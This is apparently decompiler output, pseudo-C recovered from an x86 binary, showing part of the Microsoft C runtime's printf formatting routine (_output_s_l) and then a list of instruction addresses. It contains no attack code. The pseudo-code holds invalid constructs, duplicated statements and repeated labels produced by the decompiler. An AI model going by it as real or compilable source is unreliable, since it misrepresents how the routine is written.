																			goto L83;
																		case 5:
																			L124:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			__eax = __ebp - 0x248;
																			 *(__ebp - 4) = __ebp - 0x248;
																			 *(__ebp - 0x44) = 0x200;
																			__eflags =  *(__ebp - 0x30);
																			if( *(__ebp - 0x30) >= 0) {
																				L126:
																				__eflags =  *(__ebp - 0x30);
																				if( *(__ebp - 0x30) != 0) {
																					L129:
																					__eflags =  *(__ebp - 0x30) - 0x200;
																					if( *(__ebp - 0x30) > 0x200) {
																						 *(__ebp - 0x30) = 0x200;
																					}
																					L131:
																					__eflags =  *(__ebp - 0x30) - 0xa3;
																					if( *(__ebp - 0x30) > 0xa3) {
																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																						 *(__ebp - 0x20) = L0040E5B0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																						__eflags =  *(__ebp - 0x20);
																						if( *(__ebp - 0x20) == 0) {
																							 *(__ebp - 0x30) = 0xa3;
																						} else {
																							__eax =  *(__ebp - 0x20);
																							 *(__ebp - 4) =  *(__ebp - 0x20);
																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																						}
																					}
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					__eax =  *(__ebp + 0x14);
																					__ecx =  *(__eax - 8);
																					__edx =  *(__eax - 4);
																					 *(__ebp - 0x2a8) =  *(__eax - 8);
																					 *(__ebp - 0x2a4) =  *(__eax - 4);
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__eax =  *(__ebp - 0x2c);
																					_push( *(__ebp - 0x2c));
																					__ecx =  *(__ebp - 0x30);
																					_push( *(__ebp - 0x30));
																					__edx =  *((char*)(__ebp - 0x251));
																					_push( *((char*)(__ebp - 0x251)));
																					__eax =  *(__ebp - 0x44);
																					_push( *(__ebp - 0x44));
																					__ecx =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__edx = __ebp - 0x2a8;
																					_push(__ebp - 0x2a8);
																					__eax =  *0x4bb808; // 0x776010b9
																					__eax =  *__eax();
																					__esp = __esp + 0x1c;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																					__eflags =  *(__ebp - 0x10) & 0x00000080;
																					if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																						__eflags =  *(__ebp - 0x30);
																						if( *(__ebp - 0x30) == 0) {
																							__ecx = __ebp - 0x40;
																							_push(E004103A0(__ebp - 0x40));
																							__edx =  *(__ebp - 4);
																							_push( *(__ebp - 4));
																							__eax =  *0x4bb814; // 0x776010b9
																							__eax =  *__eax();
																							__esp = __esp + 8;
																						}
																					}
																					__ecx =  *((char*)(__ebp - 0x251));
																					__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
																					if( *((char*)(__ebp - 0x251)) == 0x67) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																						__eflags =  *(__ebp - 0x10) & 0x00000080;
																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																							__ecx = __ebp - 0x40;
																							_push(E004103A0(__ebp - 0x40));
																							__eax =  *(__ebp - 4);
																							_push( *(__ebp - 4));
																							__ecx =  *0x4bb810; // 0x776010b9
																							E00411D00(__ecx) =  *__eax();
																							__esp = __esp + 8;
																						}
																					}
																					__edx =  *(__ebp - 4);
																					__eax =  *( *(__ebp - 4));
																					__eflags =  *( *(__ebp - 4)) - 0x2d;
																					if( *( *(__ebp - 4)) == 0x2d) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						__edx =  *(__ebp - 4);
																						__edx =  *(__ebp - 4) + 1;
																						__eflags = __edx;
																						 *(__ebp - 4) = __edx;
																					}
																					__eax =  *(__ebp - 4);
																					 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																					do {
																						L190:
																						__eflags =  *(__ebp - 0x28);
																						if( *(__ebp - 0x28) != 0) {
																							goto L216;
																						}
																						goto L191;
																					} while ( *(__ebp - 0x324) > 0x37);
																					goto L72;
																				}
																				L127:
																				__ecx =  *((char*)(__ebp - 0x251));
																				__eflags = __ecx - 0x67;
																				if(__ecx != 0x67) {
																					goto L129;
																				}
																				L128:
																				 *(__ebp - 0x30) = 1;
																				goto L131;
																			}
																			L125:
																			 *(__ebp - 0x30) = 6;
																			goto L131;
																		case 6:
																			L75:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
																			__eflags =  *(__ebp - 0x10) & 0x00000810;
																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
																				__ebp + 0x14 = E0041F270(__ebp + 0x14);
																				 *(__ebp - 0x284) = __ax;
																				__cl =  *(__ebp - 0x284);
																				 *(__ebp - 0x248) = __cl;
																				 *(__ebp - 0x24) = 1;
																			} else {
																				 *(__ebp - 0x280) = 0;
																				__edx = __ebp + 0x14;
																				__eax = E00421650(__ebp + 0x14);
																				 *(__ebp - 0x258) = __ax;
																				__eax =  *(__ebp - 0x258) & 0x0000ffff;
																				__ecx = __ebp - 0x248;
																				__edx = __ebp - 0x24;
																				 *(__ebp - 0x280) = E00424E90(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
																				__eflags =  *(__ebp - 0x280);
																				if( *(__ebp - 0x280) != 0) {
																					 *(__ebp - 0x28) = 1;
																				}
																			}
																			__edx = __ebp - 0x248;
																			 *(__ebp - 4) = __ebp - 0x248;
																			while(1) {
																				L190:
																				__eflags =  *(__ebp - 0x28);
																				if( *(__ebp - 0x28) != 0) {
																					goto L216;
																				}
																				goto L191;
																			}
																		case 7:
																			L144:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 8) = 0xa;
																			goto L153;
																		case 8:
																			L109:
																			__ecx = __ebp + 0x14;
																			 *(__ebp - 0x298) = E0041F270(__ebp + 0x14);
																			__eax = E00424120();
																			__eflags = __eax;
																			if(__eax != 0) {
																				L119:
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																				__eflags =  *(__ebp - 0x10) & 0x00000020;
																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																					__edx =  *(__ebp - 0x298);
																					__eax =  *(__ebp - 0x24c);
																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
																				} else {
																					__eax =  *(__ebp - 0x298);
																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
																				}
																				 *(__ebp - 0x28) = 1;
																				while(1) {
																					L190:
																					__eflags =  *(__ebp - 0x28);
																					if( *(__ebp - 0x28) != 0) {
																						goto L216;
																					}
																					goto L191;
																				}
																			}
																			L110:
																			__edx = 0;
																			__eflags = 0;
																			if(0 == 0) {
																				 *(__ebp - 0x32c) = 0;
																			} else {
																				 *(__ebp - 0x32c) = 1;
																			}
																			__eax =  *(__ebp - 0x32c);
																			 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
																			__eflags =  *(__ebp - 0x29c);
																			if( *(__ebp - 0x29c) == 0) {
																				_push(L"(\"\'n\' format specifier disabled\", 0)");
																				_push(0);
																				_push(0x695);
																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																				_push(2);
																				__eax = L0040C820();
																				__esp = __esp + 0x14;
																				__eflags = __eax - 1;
																				if(__eax == 1) {
																					asm("int3");
																				}
																			}
																			__eflags =  *(__ebp - 0x29c);
																			if( *(__ebp - 0x29c) != 0) {
																				L118:
																				while(1) {
																					L190:
																					__eflags =  *(__ebp - 0x28);
																					if( *(__ebp - 0x28) != 0) {
																						goto L216;
																					}
																					goto L191;
																				}
																			} else {
																				L117:
																				 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
																				__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
																				 *(__ebp - 0x2f8) = 0xffffffff;
																				__ecx = __ebp - 0x40;
																				__eax = E00410370(__ecx);
																				__eax =  *(__ebp - 0x2f8);
																				goto L229;
																			}
																		case 9:
																			L151:
																			 *(__ebp - 8) = 8;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			__eflags =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				__edx =  *(__ebp - 0x10);
																				__edx =  *(__ebp - 0x10) | 0x00000200;
																				__eflags = __edx;
																				 *(__ebp - 0x10) = __edx;
																			}
																			L153:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
																			__eflags =  *(__ebp - 0x10) & 0x00008000;
																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																				__eflags =  *(__ebp - 0x10) & 0x00001000;
																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																					__eflags =  *(__ebp - 0x10) & 0x00000020;
																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																						__eflags =  *(__ebp - 0x10) & 0x00000040;
																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																							__ecx = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							__edx = 0;
																							__eflags = 0;
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = 0;
																						} else {
																							__eax = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = __edx;
																						}
																					} else {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																						__eflags =  *(__ebp - 0x10) & 0x00000040;
																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																							__ecx = __ebp + 0x14;
																							E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
																							 *(__ebp - 0x2b4) = __edx;
																						} else {
																							__eax = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							__ax = __eax;
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = __edx;
																						}
																					}
																				} else {
																					__eax = __ebp + 0x14;
																					 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																					 *(__ebp - 0x2b4) = __edx;
																				}
																			} else {
																				__ecx = __ebp + 0x14;
																				 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																				 *(__ebp - 0x2b4) = __edx;
																			}
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																			__eflags =  *(__ebp - 0x10) & 0x00000040;
																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																				goto L170;
																			}
																		case 0xa:
																			goto L0;
																		case 0xb:
																			L90:
																			__eflags =  *(__ebp - 0x30) - 0xffffffff;
																			if( *(__ebp - 0x30) != 0xffffffff) {
																				__edx =  *(__ebp - 0x30);
																				 *(__ebp - 0x328) =  *(__ebp - 0x30);
																			} else {
																				 *(__ebp - 0x328) = 0x7fffffff;
																			}
																			__eax =  *(__ebp - 0x328);
																			 *(__ebp - 0x290) =  *(__ebp - 0x328);
																			__ecx = __ebp + 0x14;
																			 *(__ebp - 4) = E0041F270(__ebp + 0x14);
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
																			__eflags =  *(__ebp - 0x10) & 0x00000810;
																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
																				L101:
																				__eflags =  *(__ebp - 4);
																				if( *(__ebp - 4) == 0) {
																					__edx =  *0x4bc060; // 0x408114
																					 *(__ebp - 4) = __edx;
																				}
																				__eax =  *(__ebp - 4);
																				 *(__ebp - 0x28c) =  *(__ebp - 4);
																				while(1) {
																					L104:
																					__ecx =  *(__ebp - 0x290);
																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																					__eflags = __ecx;
																					if(__ecx == 0) {
																						break;
																					}
																					L105:
																					__eax =  *(__ebp - 0x28c);
																					__ecx =  *( *(__ebp - 0x28c));
																					__eflags = __ecx;
																					if(__ecx == 0) {
																						break;
																					}
																					L106:
																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
																				}
																				L107:
																				__eax =  *(__ebp - 0x28c);
																				__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
																				__eflags = __eax;
																				 *(__ebp - 0x24) = __eax;
																				goto L108;
																			} else {
																				L94:
																				__eflags =  *(__ebp - 4);
																				if( *(__ebp - 4) == 0) {
																					__eax =  *0x4bc064; // 0x408104
																					 *(__ebp - 4) = __eax;
																				}
																				 *(__ebp - 0xc) = 1;
																				__ecx =  *(__ebp - 4);
																				 *(__ebp - 0x294) =  *(__ebp - 4);
																				while(1) {
																					L97:
																					__edx =  *(__ebp - 0x290);
																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																					__eflags =  *(__ebp - 0x290);
																					if( *(__ebp - 0x290) == 0) {
																						break;
																					}
																					L98:
																					__ecx =  *(__ebp - 0x294);
																					__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
																					__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
																					if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
																						break;
																					}
																					L99:
																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
																				}
																				L100:
																				 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
																				__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
																				 *(__ebp - 0x24) = __ecx;
																				L108:
																				while(1) {
																					L190:
																					__eflags =  *(__ebp - 0x28);
																					if( *(__ebp - 0x28) != 0) {
																						goto L216;
																					}
																					goto L191;
																				}
																			}
																		case 0xc:
																			L145:
																			 *(__ebp - 8) = 0xa;
																			while(1) {
																				L153:
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
																				__eflags =  *(__ebp - 0x10) & 0x00008000;
																				if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																					__eflags =  *(__ebp - 0x10) & 0x00001000;
																					if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																						__eflags =  *(__ebp - 0x10) & 0x00000020;
																						if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																							__eflags =  *(__ebp - 0x10) & 0x00000040;
																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																								__ecx = __ebp + 0x14;
																								__eax = E0041F270(__ebp + 0x14);
																								__edx = 0;
																								__eflags = 0;
																								 *(__ebp - 0x2b8) = __eax;
																								 *(__ebp - 0x2b4) = 0;
																							} else {
																								__eax = __ebp + 0x14;
																								__eax = E0041F270(__ebp + 0x14);
																								asm("cdq");
																								 *(__ebp - 0x2b8) = __eax;
																								 *(__ebp - 0x2b4) = __edx;
																							}
																						} else {
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																							__eflags =  *(__ebp - 0x10) & 0x00000040;
																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																								__ecx = __ebp + 0x14;
																								E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																								asm("cdq");
																								 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
																								 *(__ebp - 0x2b4) = __edx;
																							} else {
																								__eax = __ebp + 0x14;
																								__eax = E0041F270(__ebp + 0x14);
																								__ax = __eax;
																								asm("cdq");
																								 *(__ebp - 0x2b8) = __eax;
																								 *(__ebp - 0x2b4) = __edx;
																							}
																						}
																					} else {
																						__eax = __ebp + 0x14;
																						 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																						 *(__ebp - 0x2b4) = __edx;
																					}
																				} else {
																					__ecx = __ebp + 0x14;
																					 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																					 *(__ebp - 0x2b4) = __edx;
																				}
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																				__eflags =  *(__ebp - 0x10) & 0x00000040;
																				if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																					goto L170;
																				}
																				goto L166;
																			}
																		case 0xd:
																			L147:
																			 *(__ebp - 0x260) = 0x27;
																			L148:
																			 *(__ebp - 8) = 0x10;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			__eflags =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				 *(__ebp - 0x14) = 0x30;
																				 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
																				__eflags =  *(__ebp - 0x260) + 0x51;
																				 *((char*)(__ebp - 0x13)) = __al;
																				 *(__ebp - 0x1c) = 2;
																			}
																			while(1) {
																				L153:
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
																				__eflags =  *(__ebp - 0x10) & 0x00008000;
																				if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																					__eflags =  *(__ebp - 0x10) & 0x00001000;
																					if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																						__eflags =  *(__ebp - 0x10) & 0x00000020;
																						if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																							__eflags =  *(__ebp - 0x10) & 0x00000040;
																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																								__ecx = __ebp + 0x14;
																								__eax = E0041F270(__ebp + 0x14);
																								__edx = 0;
																								__eflags = 0;
																								 *(__ebp - 0x2b8) = __eax;
																								 *(__ebp - 0x2b4) = 0;
																							} else {
																								__eax = __ebp + 0x14;
																								__eax = E0041F270(__ebp + 0x14);
																								asm("cdq");
																								 *(__ebp - 0x2b8) = __eax;
																								 *(__ebp - 0x2b4) = __edx;
																							}
																						} else {
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																							__eflags =  *(__ebp - 0x10) & 0x00000040;
																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																								__ecx = __ebp + 0x14;
																								E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																								asm("cdq");
																								 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
																								 *(__ebp - 0x2b4) = __edx;
																							} else {
																								__eax = __ebp + 0x14;
																								__eax = E0041F270(__ebp + 0x14);
																								__ax = __eax;
																								asm("cdq");
																								 *(__ebp - 0x2b8) = __eax;
																								 *(__ebp - 0x2b4) = __edx;
																							}
																						}
																					} else {
																						__eax = __ebp + 0x14;
																						 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																						 *(__ebp - 0x2b4) = __edx;
																					}
																				} else {
																					__ecx = __ebp + 0x14;
																					 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																					 *(__ebp - 0x2b4) = __edx;
																				}
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																				__eflags =  *(__ebp - 0x10) & 0x00000040;
																				if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																					goto L170;
																				}
																				goto L166;
																			}
																		case 0xe:
																			while(1) {
																				L190:
																				__eflags =  *(__ebp - 0x28);
																				if( *(__ebp - 0x28) != 0) {
																					goto L216;
																				}
																				goto L191;
																			}
																	}
																case 8:
																	L30:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
																	goto L33;
																case 9:
																	L31:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																	goto L33;
																case 0xa:
																	L29:
																	__ecx =  *(__ebp - 0x10);
																	__ecx =  *(__ebp - 0x10) | 0x00000001;
																	 *(__ebp - 0x10) = __ecx;
																	goto L33;
																case 0xb:
																	L28:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																	goto L33;
																case 0xc:
																	L32:
																	__ecx =  *(__ebp - 0x10);
																	__ecx =  *(__ebp - 0x10) | 0x00000008;
																	__eflags = __ecx;
																	 *(__ebp - 0x10) = __ecx;
																	goto L33;
																case 0xd:
																	L33:
																	goto L218;
															}
														} else {
															if(0 == 0) {
																 *(_t557 - 0x314) = 0;
															} else {
																 *(_t557 - 0x314) = 1;
															}
															_t543 =  *(_t557 - 0x314);
															 *(_t557 - 0x278) =  *(_t557 - 0x314);
															if( *(_t557 - 0x278) == 0) {
																_push(L"(\"Incorrect format specifier\", 0)");
																_push(0);
																_push(0x460);
																_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																_push(2);
																_t526 = L0040C820();
																_t559 = _t559 + 0x14;
																if(_t526 == 1) {
																	asm("int3");
																}
															}
															L14:
															if( *(_t557 - 0x278) != 0) {
																goto L16;
															} else {
																 *((intOrPtr*)(L00411810(_t543))) = 0x16;
																E0040C660(_t528, _t543, _t555, _t556, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
																 *(_t557 - 0x2f0) = 0xffffffff;
																E00410370(_t557 - 0x40);
																_t499 =  *(_t557 - 0x2f0);
																L229:
																return E00410900(_t499, _t528,  *(_t557 - 0x48) ^ _t557, _t547, _t555, _t556);
															}
														}
													}
													L219:
													__eflags =  *(_t557 - 0x25c);
													if( *(_t557 - 0x25c) == 0) {
														L222:
														 *(_t557 - 0x334) = 1;
														L223:
														_t530 =  *(_t557 - 0x334);
														 *(_t557 - 0x2e0) =  *(_t557 - 0x334);
														__eflags =  *(_t557 - 0x2e0);
														if( *(_t557 - 0x2e0) == 0) {
															_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
															_push(0);
															_push(0x8f5);
															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
															_push(2);
															_t504 = L0040C820();
															_t559 = _t559 + 0x14;
															__eflags = _t504 - 1;
															if(_t504 == 1) {
																asm("int3");
															}
														}
														__eflags =  *(_t557 - 0x2e0);
														if( *(_t557 - 0x2e0) != 0) {
															 *(_t557 - 0x300) =  *(_t557 - 0x24c);
															E00410370(_t557 - 0x40);
															_t499 =  *(_t557 - 0x300);
														} else {
															 *((intOrPtr*)(L00411810(_t530))) = 0x16;
															E0040C660(_t528, _t530, _t555, _t556, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
															 *(_t557 - 0x2fc) = 0xffffffff;
															E00410370(_t557 - 0x40);
															_t499 =  *(_t557 - 0x2fc);
														}
														goto L229;
													}
													L220:
													__eflags =  *(_t557 - 0x25c) - 7;
													if( *(_t557 - 0x25c) == 7) {
														goto L222;
													}
													L221:
													 *(_t557 - 0x334) = 0;
													goto L223;
												}
											}
											L187:
											__eflags =  *(__ebp - 0x24);
											if( *(__ebp - 0x24) == 0) {
												L189:
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												__eax =  *(__ebp - 4);
												 *( *(__ebp - 4)) = 0x30;
												__ecx =  *(__ebp - 0x24);
												__ecx =  *(__ebp - 0x24) + 1;
												__eflags = __ecx;
												 *(__ebp - 0x24) = __ecx;
												goto L190;
											}
											L188:
											__eax =  *(__ebp - 4);
											__ecx =  *( *(__ebp - 4));
											__eflags = __ecx - 0x30;
											if(__ecx == 0x30) {
												goto L190;
											}
											goto L189;
										}
										L183:
										__eax =  *(__ebp - 8);
										asm("cdq");
										__ecx =  *(__ebp - 0x2bc);
										__edx =  *(__ebp - 0x2c0);
										__eax = E00421720( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
										 *(__ebp - 0x2ac) = __eax;
										__eax =  *(__ebp - 8);
										asm("cdq");
										__eax =  *(__ebp - 0x2bc);
										__ecx =  *(__ebp - 0x2c0);
										 *(__ebp - 0x2c0) = E004216B0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
										 *(__ebp - 0x2bc) = __edx;
										__eflags =  *(__ebp - 0x2ac) - 0x39;
										if( *(__ebp - 0x2ac) > 0x39) {
											__edx =  *(__ebp - 0x2ac);
											__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
											__eflags = __edx;
											 *(__ebp - 0x2ac) = __edx;
										}
										__eax =  *(__ebp - 4);
										__cl =  *(__ebp - 0x2ac);
										 *( *(__ebp - 4)) = __cl;
										 *(__ebp - 4) =  *(__ebp - 4) - 1;
										 *(__ebp - 4) =  *(__ebp - 4) - 1;
										L181:
										__ecx =  *(__ebp - 0x30);
										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
										__eflags =  *(__ebp - 0x30);
										if( *(__ebp - 0x30) > 0) {
											goto L183;
										}
										goto L182;
									}
								}
								L168:
								__eflags =  *(__ebp - 0x2b8);
								if( *(__ebp - 0x2b8) >= 0) {
									goto L170;
								}
								goto L169;
								L170:
								__ecx =  *(__ebp - 0x2b8);
								 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
								__edx =  *(__ebp - 0x2b4);
								 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
								goto L171;
							}
						}
					}
				}
			}

0x004224e4
0x004224e4
0x004224e4
0x004224e4
0x004224eb
0x004224eb
0x004224eb
0x00422501
0x00422501
0x00422501
0x0042250b
0x0042250b
0x00422511
0x00422513
0x0042251d
0x0042251d
0x00422520
0x00422523
0x00422523
0x0042254a
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00000000
0x00000000
0x00422628
0x00422628
0x0042262f
0x00000000
0x00000000
0x00422631
0x00422631
0x0042263c
0x00422642
0x00422644
0x0042264a
0x0042264d
0x0042264f
0x00422655
0x0042265e
0x00422663
0x00422680
0x00422683
0x00422683
0x00422688
0x0042268d
0x0042268d
0x00422693
0x00422695
0x0042269b
0x004226a1
0x004226a1
0x004226aa
0x004226aa
0x00422693
0x004226b0
0x004226b4
0x004226c2
0x004226c5
0x004226c8
0x004226cf
0x004226d1
0x004226d1
0x004226b6
0x004226b6
0x004226b6
0x004226de
0x004226de
0x004226e4
0x004226e6
0x004226e6
0x004226ed
0x004226f0
0x004226f3
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00422703
0x00422709
0x00422709
0x0042270f
0x0042278c
0x0042278f
0x00422792
0x00422795
0x00422798
0x0042279b
0x004227a1
0x004227a1
0x004227a7
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x004227dc
0x004227df
0x004227df
0x004227e2
0x004227e7
0x004227e7
0x004227ec
0x004227fe
0x004227fe
0x00422801
0x00422813
0x00422813
0x00422816
0x00422818
0x0042281c
0x0042281c
0x00422803
0x00422803
0x00422807
0x00422807
0x004227ee
0x004227ee
0x004227f2
0x004227f2
0x004227ec
0x00422826
0x00422829
0x0042282c
0x00422835
0x00422835
0x00422838
0x0042283a
0x00422841
0x00422845
0x0042284e
0x00422853
0x00422856
0x0042285d
0x00422861
0x00422865
0x00422871
0x00422874
0x00422874
0x00422877
0x0042287c
0x0042287c
0x0042287f
0x00422881
0x00422888
0x0042288c
0x00422895
0x0042289a
0x0042287f
0x0042289d
0x004228a1
0x00422975
0x00422975
0x0042297c
0x00422980
0x00422984
0x00422988
0x00000000
0x004228a7
0x004228a7
0x004228a7
0x004228ab
0x00000000
0x00000000
0x004228b1
0x004228b1
